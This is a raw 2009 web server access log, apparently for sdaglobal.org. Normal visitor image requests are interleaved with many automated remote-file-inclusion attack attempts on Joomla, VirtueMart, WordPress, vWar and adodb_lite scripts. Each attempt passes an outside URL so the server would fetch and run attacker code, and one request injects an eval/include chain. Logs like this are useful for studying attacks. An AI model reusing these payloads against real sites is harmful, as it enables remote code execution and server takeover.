94.23.200.54 - - [31/May/2009:12:51:13 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:13 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:51:13 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:14 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 363
94.23.200.54 - - [31/May/2009:12:51:14 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:18 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
94.23.200.54 - - [31/May/2009:12:51:20 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 361
121.0.141.241 - - [31/May/2009:12:52:51 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 363
80.59.178.71 - - [31/May/2009:12:53:52 -0400] "GET /log/sdaglobal.org-access_log.3%20/inurl:/modules/agendax/addevent.inc.php?agendax_path=http://ciudad.latinol.com/botitos/id.txt???? HTTP/1.1" 404 352
208.38.188.128 - - [31/May/2009:12:54:23 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 364
208.38.188.128 - - [31/May/2009:12:54:23 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
208.38.188.128 - - [31/May/2009:12:54:23 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 337
203.194.204.129 - - [31/May/2009:12:55:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:12:55:15 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 347
203.194.204.129 - - [31/May/2009:12:55:15 -0400] "GET /log/sdaglobal.org-access_log%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 374
203.194.204.129 - - [31/May/2009:12:55:16 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 343
203.194.204.129 - - [31/May/2009:12:55:16 -0400] "GET /log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 347
203.194.204.129 - - [31/May/2009:12:55:16 -0400] "GET /log/sdaglobal.org-access_log//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 372
121.0.141.241 - - [31/May/2009:12:55:55 -0400] "GET /log/sdaglobal.org-access_log.4%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 363
121.0.141.241 - - [31/May/2009:12:55:55 -0400] "GET /log/sdaglobal.org-access_log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 361
209.25.133.199 - - [31/May/2009:12:56:02 -0400] "GET /log/sdaglobal.org-access_log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 354
209.25.133.199 - - [31/May/2009:12:56:02 -0400] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 325
209.25.133.199 - - [31/May/2009:12:56:03 -0400] "GET /log//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 329
213.198.53.173 - - [31/May/2009:12:56:26 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
208.38.188.128 - - [31/May/2009:12:56:32 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
213.198.53.173 - - [31/May/2009:12:57:31 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 364
213.198.53.173 - - [31/May/2009:12:57:32 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
213.198.53.173 - - [31/May/2009:12:57:32 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 337
121.0.141.241 - - [31/May/2009:12:57:42 -0400] "GET /log/sdaglobal.org-access_log.1//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 361
121.0.141.241 - - [31/May/2009:12:57:45 -0400] "GET /log/sdaglobal.org-access_log.4//components/com_facileforms/facileforms.frame.php?ff_compath=http://tkc21.co.kr/bbs/security/online/id1.txt? HTTP/1.1" 404 361
209.25.133.199 - - [31/May/2009:13:04:00 -0400] "GET /log/sdaglobal.org-access_log.4//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.salaopontochic.com.br/r0x.txt? HTTP/1.1" 404 356
65.55.208.242 - - [31/May/2009:13:05:47 -0400] "GET /robots.txt HTTP/1.1" 404 291
65.55.208.242 - - [31/May/2009:13:05:48 -0400] "GET /log/matthew.hitechemall.com-error_log HTTP/1.1" 304 -
110.45.145.50 - - [31/May/2009:13:07:40 -0400] "GET /log/sdaglobal.org-access_log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 353
110.45.145.50 - - [31/May/2009:13:07:40 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 324
110.45.145.50 - - [31/May/2009:13:07:41 -0400] "GET /log/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 328
24.209.155.141 - - [31/May/2009:13:12:02 -0400] "GET / HTTP/1.1" 200 9432
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /_derived/index.html_cmp_sda010_bnr.gif HTTP/1.1" 200 9017
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /_themes/sda/lebkgnd.jpg HTTP/1.1" 200 4389
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /images/welcome.gif HTTP/1.1" 200 2565
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /images/select.gif HTTP/1.1" 200 1792
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /images/english.gif HTTP/1.1" 200 2582
24.209.155.141 - - [31/May/2009:13:12:03 -0400] "GET /images/chinese.gif HTTP/1.1" 200 3578
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/china.gif HTTP/1.1" 200 3479
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/czech.gif HTTP/1.1" 200 1137
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/filipino.gif HTTP/1.1" 200 1328
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/france.gif HTTP/1.1" 200 1094
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/germany.gif HTTP/1.1" 200 986
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/hungary.gif HTTP/1.1" 200 1115
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/india.gif HTTP/1.1" 200 1050
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/italy.gif HTTP/1.1" 200 1095
24.209.155.141 - - [31/May/2009:13:12:04 -0400] "GET /images/japan.gif HTTP/1.1" 200 1104
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/korea.gif HTTP/1.1" 200 1387
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/nepal.gif HTTP/1.1" 200 1130
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/portugal.gif HTTP/1.1" 200 1322
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/russia.gif HTTP/1.1" 200 1039
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/sweden.gif HTTP/1.1" 200 1104
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/spain.gif HTTP/1.1" 200 1360
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/thailand.gif HTTP/1.1" 200 1060
24.209.155.141 - - [31/May/2009:13:12:05 -0400] "GET /images/vietnam.gif HTTP/1.1" 200 1055
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/vop.jpg HTTP/1.1" 200 2215
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/3abn.gif HTTP/1.1" 200 3774
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/bibsab.gif HTTP/1.1" 200 2786
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/hopeint.jpg HTTP/1.1" 200 2596
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/iiw.jpg HTTP/1.1" 200 2052
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/omega.gif HTTP/1.1" 200 956
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/amazdisc.gif HTTP/1.1" 200 3426
24.209.155.141 - - [31/May/2009:13:12:06 -0400] "GET /images/amazfact.gif HTTP/1.1" 200 2896
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/promesy.gif HTTP/1.1" 200 2097
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/bibplus.gif HTTP/1.1" 200 3598
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/hopetalk.gif HTTP/1.1" 200 3618
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/teachart.gif HTTP/1.1" 200 1484
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/knowjes.gif HTTP/1.1" 200 3848
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/gawake.gif HTTP/1.1" 200 3422
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/crusade.jpg HTTP/1.1" 200 4146
24.209.155.141 - - [31/May/2009:13:12:07 -0400] "GET /images/coming.jpg HTTP/1.1" 200 4137
24.209.155.141 - - [31/May/2009:13:12:08 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
24.209.155.141 - - [31/May/2009:13:12:08 -0400] "GET /images/voh.gif HTTP/1.1" 200 2001
69.94.125.100 - - [31/May/2009:13:12:16 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 343
69.94.125.100 - - [31/May/2009:13:12:16 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:13:12:16 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
24.209.155.141 - - [31/May/2009:13:12:21 -0400] "GET /images/nimenqu.gif HTTP/1.1" 200 3797
24.209.155.141 - - [31/May/2009:13:12:21 -0400] "GET /images/tempcat.jpg HTTP/1.1" 200 2385
24.209.155.141 - - [31/May/2009:13:12:21 -0400] "GET /images/lamp.gif HTTP/1.1" 200 2052
24.209.155.141 - - [31/May/2009:13:12:21 -0400] "GET /images/lamb.gif HTTP/1.1" 200 1920
69.94.125.100 - - [31/May/2009:13:12:23 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 310
69.94.125.100 - - [31/May/2009:13:12:23 -0400] "GET /log//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 314
69.94.125.100 - - [31/May/2009:13:12:23 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//modules/vwar/admin/admin.php?vwar_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 343
208.80.195.56 - - [31/May/2009:13:13:32 -0400] "GET / HTTP/1.0" 200 9432
69.72.219.234 - - [31/May/2009:13:13:51 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 404 337
69.72.219.234 - - [31/May/2009:13:13:51 -0400] "GET /log/sdaglobal.org-access_log.1///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 404 364
69.72.219.234 - - [31/May/2009:13:13:52 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.festzim.com/festzim/idpriv8.txt?? HTTP/1.1" 404 333
213.198.53.173 - - [31/May/2009:13:14:26 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
208.38.188.128 - - [31/May/2009:13:17:07 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
151.68.236.34 - - [31/May/2009:13:17:35 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 336
151.68.236.34 - - [31/May/2009:13:17:35 -0400] "GET //include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
151.68.236.34 - - [31/May/2009:13:17:36 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 311
151.68.236.34 - - [31/May/2009:13:18:06 -0400] "GET /log/sdaglobal.org-error_log.1//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 337
218.234.23.44 - - [31/May/2009:13:18:52 -0400] "GET /log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 350
110.45.145.50 - - [31/May/2009:13:19:59 -0400] "GET /log/sdaglobal.org-access_log.4/assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 355
208.38.188.128 - - [31/May/2009:13:22:33 -0400] "GET /log/sdaglobal.org-access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 362
208.38.188.128 - - [31/May/2009:13:22:34 -0400] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 333
208.38.188.128 - - [31/May/2009:13:22:34 -0400] "GET /log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://aene.de/eMCe/test.txt?? HTTP/1.1" 404 337
122.117.184.187 - - [31/May/2009:13:22:52 -0400] "GET /images/china.gif HTTP/1.1" 304 -
122.117.184.187 - - [31/May/2009:13:22:52 -0400] "GET /images/chinese.gif HTTP/1.1" 304 -
110.45.145.50 - - [31/May/2009:13:23:02 -0400] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.teampoint-koeln.de/images/cek.jpg?? HTTP/1.1" 404 324
65.55.208.242 - - [31/May/2009:13:23:23 -0400] "GET /log/ HTTP/1.1" 200 58346
66.249.72.107 - - [31/May/2009:13:25:47 -0400] "GET /log/english.sdaglobal.org-access_log.2 HTTP/1.1" 200 2659465
110.45.145.50 - - [31/May/2009:13:26:27 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.icozon.com/images/help111.gif?? HTTP/1.1" 404 307
79.35.228.196 - - [31/May/2009:13:27:51 -0400] "GET /images/gd.gif HTTP/1.1" 200 4458
151.68.236.34 - - [31/May/2009:13:29:49 -0400] "GET /log/sdaglobal.org-access_log//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 336
151.68.236.34 - - [31/May/2009:13:29:50 -0400] "GET //include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 307
151.68.236.34 - - [31/May/2009:13:29:50 -0400] "GET /log//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 311
151.68.236.34 - - [31/May/2009:13:33:28 -0400] "GET /log/sdaglobal.org-error_log.4//include/admin.lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 337
64.182.124.1 - - [31/May/2009:13:33:48 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
64.182.124.1 - - [31/May/2009:13:33:48 -0400] "GET /log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58350
64.182.124.1 - - [31/May/2009:13:33:49 -0400] "GET /log/sdaglobal.org-access_log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 311
64.182.124.1 - - [31/May/2009:13:34:15 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
64.182.124.1 - - [31/May/2009:13:34:16 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 313
64.182.124.1 - - [31/May/2009:13:34:16 -0400] "GET /log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58350
222.239.76.25 - - [31/May/2009:13:35:32 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 321
222.239.76.25 - - [31/May/2009:13:35:32 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325
222.239.76.25 - - [31/May/2009:13:35:32 -0400] "GET /log/sdaglobal.org-access_log.4/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 352
87.152.85.66 - - [31/May/2009:13:36:25 -0400] "GET / HTTP/1.0" 200 9432
87.152.85.66 - - [31/May/2009:13:36:26 -0400] "GET / HTTP/1.0" 200 9432
94.23.200.54 - - [31/May/2009:13:38:05 -0400] "GET /log/sdaglobal.org-access_log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 314
94.23.200.54 - - [31/May/2009:13:38:05 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 9432
94.23.200.54 - - [31/May/2009:13:38:05 -0400] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 58351
94.23.200.54 - - [31/May/2009:13:38:09 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 9432
94.23.200.54 - - [31/May/2009:13:38:09 -0400] "GET /log/sdaglobal.org-access_log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 314
94.23.200.54 - - [31/May/2009:13:38:09 -0400] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 58351
94.23.200.54 - - [31/May/2009:13:38:47 -0400] "GET /log/sdaglobal.org-access_log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 314
94.23.200.54 - - [31/May/2009:13:38:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 9432
94.23.200.54 - - [31/May/2009:13:38:47 -0400] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 58351
94.23.200.54 - - [31/May/2009:13:38:55 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 9432
94.23.200.54 - - [31/May/2009:13:38:55 -0400] "GET /log/sdaglobal.org-access_log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 404 314
94.23.200.54 - - [31/May/2009:13:38:55 -0400] "GET /log///?_SERVER[DOCUMENT_ROOT]=http://www.therockcc.org/calendarevents/1.txt? HTTP/1.1" 200 58351
222.239.76.25 - - [31/May/2009:13:39:03 -0400] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 321
222.239.76.25 - - [31/May/2009:13:39:03 -0400] "GET /log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 325
222.239.76.25 - - [31/May/2009:13:39:03 -0400] "GET /log/sdaglobal.org-access_log.3%20%20/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 354
64.182.124.1 - - [31/May/2009:13:39:20 -0400] "GET //?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 9432
64.182.124.1 - - [31/May/2009:13:39:20 -0400] "GET /log/sdaglobal.org-access_log%20%20//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 404 313
64.182.124.1 - - [31/May/2009:13:39:21 -0400] "GET /log//?_SERVER%5BDOCUMENT_ROOT%5D=http://www.abrasive.ru/catalog/dtroy/id1.txt?? HTTP/1.0" 200 58350
151.68.236.34 - - [31/May/2009:13:42:23 -0400] "GET /log/sdaglobal.org-access_log.1//include/lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 332
151.68.236.34 - - [31/May/2009:13:42:24 -0400] "GET //include/lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 301
151.68.236.34 - - [31/May/2009:13:42:24 -0400] "GET /log//include/lib.inc.php?site_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 305
222.239.76.25 - - [31/May/2009:13:42:39 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
222.239.76.25 - - [31/May/2009:13:42:39 -0400] "GET /log/sdaglobal.org-access_log.1%20%20//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 333
222.239.76.25 - - [31/May/2009:13:42:39 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
222.239.76.25 - - [31/May/2009:13:42:39 -0400] "GET /log/sdaglobal.org-access_log.3%20%20//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 333
222.239.76.25 - - [31/May/2009:13:43:49 -0400] "GET //twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 300
222.239.76.25 - - [31/May/2009:13:43:49 -0400] "GET /log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 304
222.239.76.25 - - [31/May/2009:13:43:49 -0400] "GET /log/sdaglobal.org-access_log//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 329
222.239.76.25 - - [31/May/2009:13:43:53 -0400] "GET /log/sdaglobal.org-access_log.4//twindow_notice.php?shop_this_skin_path=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 331
83.103.72.130 - - [31/May/2009:13:44:09 -0400] "GET /log/sdaglobal.org-access_log.1%20%20/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 350
83.103.72.130 - - [31/May/2009:13:44:09 -0400] "GET /log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 321
83.103.72.130 - - [31/May/2009:13:44:09 -0400] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 317
